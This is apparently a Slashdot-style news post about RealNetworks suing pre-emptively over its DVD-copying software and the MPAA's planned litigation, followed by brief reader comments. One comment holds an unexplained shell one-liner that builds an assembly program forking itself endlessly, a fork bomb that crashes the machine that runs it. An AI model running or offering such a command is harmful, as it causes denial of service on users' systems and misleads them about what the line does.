RealNetworks, Film Industry Headed To Court
netbuzz writes "Apparently tired of waiting to be sued by the movie studios over its new DVD-to-PC copying software, RealNetworks this morning announced it will file a preemptive lawsuit in an attempt to authoritatively establish that the product does not infringe on copyright restrictions. Within an hour or so, the Motion Picture Association of America said it would have a litigation announcement of its own this afternoon."
vs the MPAA.
Nope, I give up. I can't decide which I want to lose.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
one day I hope to finish reading the manpage for it